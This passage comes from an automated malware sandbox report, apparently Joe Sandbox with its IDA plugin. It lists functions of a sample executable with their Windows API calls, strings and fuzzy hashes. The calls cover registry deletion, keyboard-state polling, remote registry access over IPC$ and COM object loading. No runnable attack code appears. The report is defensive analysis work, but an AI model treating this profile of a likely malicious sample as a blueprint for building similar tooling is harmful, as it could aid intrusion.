                                                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B1DCBC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                  • API String ID: 1939486746-1459072770
                                                                                                                  • Opcode ID: 7862cf8b2faa67069b1579c16055d5858ad077df45a81f32ed34f18267d1f27c
                                                                                                                  • Instruction ID: a12db55ea746e87749c5923a00352ea8cf72304e33cae8597c935d6937d6c106
                                                                                                                  • Opcode Fuzzy Hash: 7862cf8b2faa67069b1579c16055d5858ad077df45a81f32ed34f18267d1f27c
                                                                                                                  • Instruction Fuzzy Hash: 16410672A402047BDB10A774ED43FFF77ACEF56B10F5040AAF901A6293EB749A0197A5
                                                                                                                  Function 00B3CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B3CC64
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B3CC8D
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B3CD48
                                                                                                                    • Part of subcall function 00B3CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B3CCAA
                                                                                                                    • Part of subcall function 00B3CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B3CCBD
                                                                                                                    • Part of subcall function 00B3CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B3CCCF
                                                                                                                    • Part of subcall function 00B3CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B3CD05
                                                                                                                    • Part of subcall function 00B3CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B3CD28
                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B3CCF3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                  • API String ID: 2734957052-4033151799
                                                                                                                  • Opcode ID: 75ffca4eafc4d65b74c06c9072d9f6179fdb0ec47757876b418d3eb90e4abd63
                                                                                                                  • Instruction ID: 3a5f0dfa1b738eae2613bd3571e200f1c1b4ae4c7793ab71cec4720fee974959
                                                                                                                  • Opcode Fuzzy Hash: 75ffca4eafc4d65b74c06c9072d9f6179fdb0ec47757876b418d3eb90e4abd63
                                                                                                                  • Instruction Fuzzy Hash: 4C313C75942129BBD7208B95DC88EFFBFBCEF46750F1001A5B905E3250DE349A459BA0
                                                                                                                  Function 00B23D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B23D40
                                                                                                                  • _wcslen.LIBCMT ref: 00B23D6D
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B23D9D
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B23DBE
                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00B23DCE
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B23E55
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B23E60
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B23E6B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                  • API String ID: 1149970189-3457252023
                                                                                                                  • Opcode ID: 30f93bfba3ab58e78c418dcaa39c10338a5f024fdbf1433ea0bef106cc54d177
                                                                                                                  • Instruction ID: 5925dcef3791938f2aa5570ea19bc699f0eae347ab1eecc2954015efab8c87b7
                                                                                                                  • Opcode Fuzzy Hash: 30f93bfba3ab58e78c418dcaa39c10338a5f024fdbf1433ea0bef106cc54d177
                                                                                                                  • Instruction Fuzzy Hash: 8231AF76A00219ABDB209FA0DC49FEB37FCEF89B40F1041B6F609D6160EB7497448B24
                                                                                                                  Function 00B1E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • timeGetTime.WINMM ref: 00B1E6B4
                                                                                                                    • Part of subcall function 00ACE551: timeGetTime.WINMM(?,?,00B1E6D4), ref: 00ACE555
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00B1E6E1
                                                                                                                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00B1E705
                                                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B1E727
                                                                                                                  • SetActiveWindow.USER32 ref: 00B1E746
                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B1E754
                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B1E773
                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00B1E77E
                                                                                                                  • IsWindow.USER32 ref: 00B1E78A
                                                                                                                  • EndDialog.USER32(00000000), ref: 00B1E79B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                  • String ID: BUTTON
                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                  • Opcode ID: 3762bd19c0a7f1b2006be8a61fda59be6ae6584886407cbe63988392f599a518
                                                                                                                  • Instruction ID: fc3719d30c7074379b6abb75edf6439e3a57d41f72130f7e3f27e6741a760ef5
                                                                                                                  • Opcode Fuzzy Hash: 3762bd19c0a7f1b2006be8a61fda59be6ae6584886407cbe63988392f599a518
                                                                                                                  • Instruction Fuzzy Hash: 53216DB4201204AFFB005F20EC89A6A3FE9FB56B48B944465F925831B1EF71ED80CB24
                                                                                                                  Function 00B1E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B1EA5D
                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B1EA73
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B1EA84
                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B1EA96
                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B1EAA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$_wcslen
                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                  • API String ID: 2420728520-1007645807
                                                                                                                  • Opcode ID: 9019b4dbcefbc3190288b23569773fe52816a4c0e9097ac270dc688d7fbeb9e2
                                                                                                                  • Instruction ID: 1b355dd71e1e507a2bd66a213c3dcfc2fd93affb391ad176be1a2fe9b2c50063
                                                                                                                  • Opcode Fuzzy Hash: 9019b4dbcefbc3190288b23569773fe52816a4c0e9097ac270dc688d7fbeb9e2
                                                                                                                  • Instruction Fuzzy Hash: EA119131A5021979D720A7A1DD4ADFF6FFCEFD5F00F404469B925A20E2EE704944C5B0
                                                                                                                  Function 00B19F91 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00B1A012
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00B1A07D
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00B1A09D
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00B1A0B4
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00B1A0E3
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00B1A0F4
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00B1A120
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00B1A12E
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00B1A157
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00B1A165
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00B1A18E
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00B1A19C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 2668cf066fa02c6757e23f10b041118feec89d84c1f3201188057f4ed74a6b97
                                                                                                                  • Instruction ID: 1033ab05f946a8b454deb5a6c8a6127868dddca88ddda02b98089c424f4f116c
                                                                                                                  • Opcode Fuzzy Hash: 2668cf066fa02c6757e23f10b041118feec89d84c1f3201188057f4ed74a6b97
                                                                                                                  • Instruction Fuzzy Hash: F051D8609057C439FB35EB608815BEAAFF4DF12380F8885D9D5C2971C2DA64BACCC762
                                                                                                                  Function 00B15CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00B15CE2
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B15CFB
                                                                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B15D59
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00B15D69
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B15D7B
                                                                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B15DCF
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B15DDD
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B15DEF
                                                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B15E31
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00B15E44
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B15E5A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B15E67
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3096461208-0
                                                                                                                  • Opcode ID: ec4ef69add533bc1b29897bbe5da3fbf8ff77c6b2dffbb665279bd516f21135d
                                                                                                                  • Instruction ID: 7722a8cafd95718d6b3c1195585d1ee7915eb14b235f54babd763bad815c4ae0
                                                                                                                  • Opcode Fuzzy Hash: ec4ef69add533bc1b29897bbe5da3fbf8ff77c6b2dffbb665279bd516f21135d
                                                                                                                  • Instruction Fuzzy Hash: CF511D75B00605AFDB18CF68DD89AAEBBF5FB89700F508169F915E7290DB709E40CB50
                                                                                                                  Function 00AC8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AC8BE8,?,00000000,?,?,?,?,00AC8BBA,00000000,?), ref: 00AC8FC5
                                                                                                                  • DestroyWindow.USER32(?), ref: 00AC8C81
                                                                                                                  • KillTimer.USER32(00000000,?,?,?,?,00AC8BBA,00000000,?), ref: 00AC8D1B
                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00B06973
                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00AC8BBA,00000000,?), ref: 00B069A1
                                                                                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00AC8BBA,00000000,?), ref: 00B069B8
                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AC8BBA,00000000), ref: 00B069D4
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B069E6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 641708696-0
                                                                                                                  • Opcode ID: 44ce756a47dadef065938ea3ace13ab495d36d3684705afd0fd3489a0217d682
                                                                                                                  • Instruction ID: 16169373da2403fcdb45d29b7764c38d1adbb569bb393fc5bd9d3274b788a468
                                                                                                                  • Opcode Fuzzy Hash: 44ce756a47dadef065938ea3ace13ab495d36d3684705afd0fd3489a0217d682
                                                                                                                  • Instruction Fuzzy Hash: 7B619935106610DFCB259F18DA48B2A7BF1FB41312F12495CE0429BAB0CF39AD92DFA4
                                                                                                                  Function 00AC9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9944: GetWindowLongW.USER32(?,000000EB), ref: 00AC9952
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00AC9862
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ColorLongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 259745315-0
                                                                                                                  • Opcode ID: 561dec298a2c5911862672a4c4b14d335d79cf73f059383ac432ecece025363b
                                                                                                                  • Instruction ID: 8fb5b1670b10544021f25f3766276ad6d7cea9eda4af40dcb88f27faea4cdb78
                                                                                                                  • Opcode Fuzzy Hash: 561dec298a2c5911862672a4c4b14d335d79cf73f059383ac432ecece025363b
                                                                                                                  • Instruction Fuzzy Hash: BD41C135505650AFDB205F389C88FBA3BA5FB17730F154649F9A29B2E2CB309E42DB10
                                                                                                                  Function 00B196E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00AFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00B19717
                                                                                                                  • LoadStringW.USER32(00000000,?,00AFF7F8,00000001), ref: 00B19720
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00B19742
                                                                                                                  • LoadStringW.USER32(00000000,?,00AFF7F8,00000001), ref: 00B19745
                                                                                                                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00B19866
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                  • API String ID: 747408836-2268648507
                                                                                                                  • Opcode ID: b3e9f831bfc7f58970edc96246898a80c170358368f6775b0bb3de479d478a27
                                                                                                                  • Instruction ID: 0936e4bc190db7d3500cc95f383013dc2e8d267ffe8c1ce011f6f8b899e996b2
                                                                                                                  • Opcode Fuzzy Hash: b3e9f831bfc7f58970edc96246898a80c170358368f6775b0bb3de479d478a27
                                                                                                                  • Instruction Fuzzy Hash: 9A411C72800219AACF04EBE0DE96EEFB7BCAF55740F604065F60576092EB356F48CB61
                                                                                                                  Function 00B106DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B107A2
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B107BE
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B107DA
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B10804
                                                                                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B1082C
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B10837
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B1083C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                  • API String ID: 323675364-22481851
                                                                                                                  • Opcode ID: dca05e0b4fd9b761fef9927ef35c70263868f225247224d38093c295cc0f882b
                                                                                                                  • Instruction ID: 40ff1c69509df1b0b00ea661579a9788307c1b41e11f8021ef807bbc4e3d20dc
                                                                                                                  • Opcode Fuzzy Hash: dca05e0b4fd9b761fef9927ef35c70263868f225247224d38093c295cc0f882b
                                                                                                                  • Instruction Fuzzy Hash: 09413972C10229ABDF21EFA4DD95CEEB7B8FF04740F444169E915A71A1EB709E44CB90
                                                                                                                  Function 00B33C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B33C5C
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00B33C8A
                                                                                                                  • CoUninitialize.OLE32 ref: 00B33C94
                                                                                                                  • _wcslen.LIBCMT ref: 00B33D2D
                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00B33DB1
                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B33ED5
                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B33F0E
                                                                                                                  • CoGetObject.OLE32(?,00000000,00B4FB98,?), ref: 00B33F2D
                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00B33F40
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B33FC4
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B33FD8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
